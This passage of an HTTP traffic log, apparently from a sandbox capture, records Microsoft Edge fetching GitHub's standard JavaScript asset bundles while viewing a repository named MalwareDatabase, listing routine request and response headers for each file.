accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Fri, 26 Jan 2024 14:37:34 GMT
etag: 0x8DC1E7C55AB5C06
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 29 Feb 2024 15:32:46 GMT
age: 2687055
x-served-by: cache-iad-kjyo7100082-IAD, cache-lcy-eglc8600045-LCY
x-cache: HIT, HIT
x-cache-hits: 17, 103529
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 98afc6455849f1b0d50f9fb7f35ac64cae88ca61
content-length: 4929
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_details-dialog-elemen-29dc30-a2a71f11a507.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_details-dialog-elemen-29dc30-a2a71f11a507.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Mon, 26 Feb 2024 19:17:29 GMT
etag: 0x8DC36FF9311C578
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 29 Feb 2024 15:32:46 GMT
age: 106301
x-served-by: cache-iad-kcgs7200020-IAD, cache-lcy-eglc8600045-LCY
x-cache: HIT, HIT
x-cache-hits: 8, 8458
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: e90ca98071060168ab1280ae713183b2e236bbeb
content-length: 5298
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_github_auto-complete-element_dist_index_js-12366198e7a5.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/vendors-node_modules_github_auto-complete-element_dist_index_js-12366198e7a5.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Wed, 28 Feb 2024 13:59:24 GMT
etag: 0x8DC386578CE1E7D
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 29 Feb 2024 15:32:46 GMT
age: 85852
x-served-by: cache-iad-kjyo7100057-IAD, cache-lcy-eglc8600045-LCY
x-cache: HIT, HIT
x-cache-hits: 27, 6315
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 00fc4285e0b4b25caa957fc3aafe791730c5b4ec
content-length: 3975
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_github_text-expander-element_dist_index_js-8fae124883ef.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/vendors-node_modules_github_text-expander-element_dist_index_js-8fae124883ef.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Fri, 23 Feb 2024 10:52:50 GMT
etag: 0x8DC345D9410B528
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 29 Feb 2024 15:32:46 GMT
age: 106301
x-served-by: cache-iad-kcgs7200099-IAD, cache-lcy-eglc8600045-LCY
x-cache: HIT, HIT
x-cache-hits: 8, 8469
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 2e34a4516f86cce529aa8319467af7db6fe8867b
content-length: 4357
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_remote-inp-b7d8f4-8cd02f324209.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_remote-inp-b7d8f4-8cd02f324209.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Tue, 13 Feb 2024 15:39:59 GMT
etag: 0x8DC2CAA094D216C
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 29 Feb 2024 15:32:46 GMT
age: 1227894
x-served-by: cache-iad-kjyo7100064-IAD, cache-lcy-eglc8600045-LCY
x-cache: HIT, HIT
x-cache-hits: 1, 6475
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: c3a5230a10019fc5cca32aaf63e5ebd79fb341fe
content-length: 5927
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_primer_view-co-edcaff-3c8d982e3513.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_primer_view-co-edcaff-3c8d982e3513.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Wed, 28 Feb 2024 13:59:20 GMT
etag: 0x8DC38657633355B
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 29 Feb 2024 15:32:46 GMT
age: 85852
x-served-by: cache-iad-kcgs7200027-IAD, cache-lcy-eglc8600045-LCY
x-cache: HIT, HIT
x-cache-hits: 27, 6350
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: cfeec3d08b6d737d4161cfb3e767114255e97391
content-length: 12112
-
Remote address:185.199.108.154:443RequestGET /assets/github-elements-2cfb51438f96.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Wed, 28 Feb 2024 13:59:20 GMT
etag: 0x8DC386575E95FDE
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 29 Feb 2024 15:32:46 GMT
age: 85852
x-served-by: cache-iad-kcgs7200178-IAD, cache-lcy-eglc8600045-LCY
x-cache: HIT, HIT
x-cache-hits: 27, 480
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 34e1020ab781a09884d034304bbdd8e0279773ec
content-length: 8272
-
Remote address:185.199.108.154:443RequestGET /assets/element-registry-54ada9578c04.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Mon, 26 Feb 2024 19:17:29 GMT
etag: 0x8DC36FF93126100
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 29 Feb 2024 15:32:46 GMT
age: 106301
x-served-by: cache-iad-kiad7000113-IAD, cache-lcy-eglc8600045-LCY
x-cache: HIT, HIT
x-cache-hits: 8, 8555
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 4a69ef7f088b20157c2be29c0df1e9b10dd834bc
content-length: 23680
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_github_catalyst_lib_index_js-node_modules_github_hydro-analytics-client_-978abc0-add939c751ce.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/vendors-node_modules_github_catalyst_lib_index_js-node_modules_github_hydro-analytics-client_-978abc0-add939c751ce.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Sat, 10 Feb 2024 01:12:23 GMT
etag: 0x8DC29D55635FA6B
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 29 Feb 2024 15:32:46 GMT
age: 1364746
x-served-by: cache-iad-kiad7000162-IAD, cache-lcy-eglc8600045-LCY
x-cache: HIT, HIT
x-cache-hits: 37, 63199
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 73ab9379336ce029cd748d4806856ece82564832
content-length: 3377
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_lit-html_lit-html_js-5b376145beff.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/vendors-node_modules_lit-html_lit-html_js-5b376145beff.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Tue, 24 Oct 2023 17:57:35 GMT
etag: 0x8DBD4BAB41AC2C2
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 29 Feb 2024 15:32:46 GMT
age: 4706939
x-served-by: cache-iad-kiad7000150-IAD, cache-lcy-eglc8600045-LCY
x-cache: MISS, HIT
x-cache-hits: 0, 98604
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: c049016f94e08a2665666f76d536d6520893c246
content-length: 4293
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_github_alive-client_dist-bf5aa2-1b562c29ab8e.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_github_alive-client_dist-bf5aa2-1b562c29ab8e.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Tue, 24 Oct 2023 17:57:35 GMT
etag: 0x8DBD4BAB41FED15
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 29 Feb 2024 15:32:46 GMT
age: 4426846
x-served-by: cache-iad-kcgs7200087-IAD, cache-lcy-eglc8600045-LCY
x-cache: HIT, HIT
x-cache-hits: 83, 98409
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 1e82cd1e68a2ab66d8e65470ed2b35cce88d2ebb
content-length: 2214
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_morphdom_dist_morphdom-esm_js-5bff297a06de.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/vendors-node_modules_morphdom_dist_morphdom-esm_js-5bff297a06de.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Tue, 24 Oct 2023 17:57:35 GMT
etag: 0x8DBD4BAB3E3019F
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 29 Feb 2024 15:32:46 GMT
age: 4706968
x-served-by: cache-iad-kiad7000176-IAD, cache-lcy-eglc8600045-LCY
x-cache: HIT, HIT
x-cache-hits: 130, 98876
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 70ecd32f59b5b6ca35d97c10ff33c8fa0392ab98
content-length: 4555
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_github_turbo_dist_turbo_es2017-esm_js-c91f4ad18b62.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/vendors-node_modules_github_turbo_dist_turbo_es2017-esm_js-c91f4ad18b62.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Tue, 24 Oct 2023 17:57:34 GMT
etag: 0x8DBD4BAB3AB8E38
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 29 Feb 2024 15:32:46 GMT
age: 4706935
x-served-by: cache-iad-kcgs7200101-IAD, cache-lcy-eglc8600045-LCY
x-cache: HIT, HIT
x-cache-hits: 2070, 99226
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 4600374a57d1af155365d046fada8ffa2571cb2b
content-length: 5317
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_color-convert_index_js-72c9fbde5ad4.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/vendors-node_modules_color-convert_index_js-72c9fbde5ad4.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Wed, 13 Dec 2023 15:12:54 GMT
etag: 0x8DBFBEDFB2FB89D
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 29 Feb 2024 15:32:46 GMT
age: 4706928
x-served-by: cache-iad-kjyo7100113-IAD, cache-lcy-eglc8600045-LCY
x-cache: HIT, HIT
x-cache-hits: 686, 99528
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 904783540b2c6ff29556ff07aaf7bde5394d2f92
content-length: 4166
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_scroll-anchoring_dist_scro-231ccf-aa129238d13b.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_scroll-anchoring_dist_scro-231ccf-aa129238d13b.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Wed, 13 Dec 2023 17:40:24 GMT
etag: 0x8DBFC029676217D
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 29 Feb 2024 15:32:46 GMT
age: 2629433
x-served-by: cache-iad-kiad7000173-IAD, cache-lcy-eglc8600045-LCY
x-cache: HIT, HIT
x-cache-hits: 3270, 103164
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 997d749c1f51ec11887fc7421c2570d8f61c3f50
content-length: 21225
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_dimensions_js-node_modules_github_jtml_lib_index_js-95b84ee6bc34.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/vendors-node_modules_primer_behaviors_dist_esm_dimensions_js-node_modules_github_jtml_lib_index_js-95b84ee6bc34.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Tue, 30 Jan 2024 20:25:24 GMT
etag: 0x8DC21D197431ADA
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 29 Feb 2024 15:32:46 GMT
age: 2490177
x-served-by: cache-iad-kjyo7100060-IAD, cache-lcy-eglc8600045-LCY
x-cache: HIT, HIT
x-cache-hits: 3147, 6590
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: b7e89107496b53cfebd8993b170e794d8dd5484c
content-length: 13890
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_github_paste-markdown_dist_index_esm_js-node_modules_github_quote-select-cbac5f-5c15271fc07d.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/vendors-node_modules_github_paste-markdown_dist_index_esm_js-node_modules_github_quote-select-cbac5f-5c15271fc07d.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Tue, 05 Dec 2023 19:17:13 GMT
etag: 0x8DBF5C6C9ABE518
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 29 Feb 2024 15:32:46 GMT
age: 4706942
x-served-by: cache-iad-kjyo7100150-IAD, cache-lcy-eglc8600045-LCY
x-cache: HIT, HIT
x-cache-hits: 20, 99927
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: a09acbb8255f89cfe1c68f0272726a152e5243fd
content-length: 3294
-
GEThttps://github.githubassets.com/assets/app_assets_modules_github_updatable-content_ts-ee3fc84d7fb0.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/app_assets_modules_github_updatable-content_ts-ee3fc84d7fb0.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Thu, 22 Feb 2024 16:53:07 GMT
etag: 0x8DC33C6BE772D99
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 29 Feb 2024 15:32:46 GMT
age: 85852
x-served-by: cache-iad-kcgs7200158-IAD, cache-lcy-eglc8600045-LCY
x-cache: HIT, HIT
x-cache-hits: 27, 6352
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 63e3532a7a6e1f8b82e099076c7316fff674d907
content-length: 5604
-
GEThttps://github.githubassets.com/assets/app_assets_modules_github_behaviors_task-list_ts-app_assets_modules_github_onfocus_ts-app_ass-421cec-9de4213015af.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/app_assets_modules_github_behaviors_task-list_ts-app_assets_modules_github_onfocus_ts-app_ass-421cec-9de4213015af.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Thu, 22 Feb 2024 16:53:07 GMT
etag: 0x8DC33C6BE7BBC60
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 29 Feb 2024 15:32:46 GMT
age: 85852
x-served-by: cache-iad-kjyo7100074-IAD, cache-lcy-eglc8600045-LCY
x-cache: HIT, HIT
x-cache-hits: 27, 6396
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: fc2d740911caad8036b8e110e1fe1f15d021e9fa
content-length: 5127
-
GEThttps://github.githubassets.com/assets/app_assets_modules_github_sticky-scroll-into-view_ts-b0257485d817.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/app_assets_modules_github_sticky-scroll-into-view_ts-b0257485d817.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Thu, 22 Feb 2024 16:53:07 GMT
etag: 0x8DC33C6BE77547E
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 29 Feb 2024 15:32:46 GMT
age: 85852
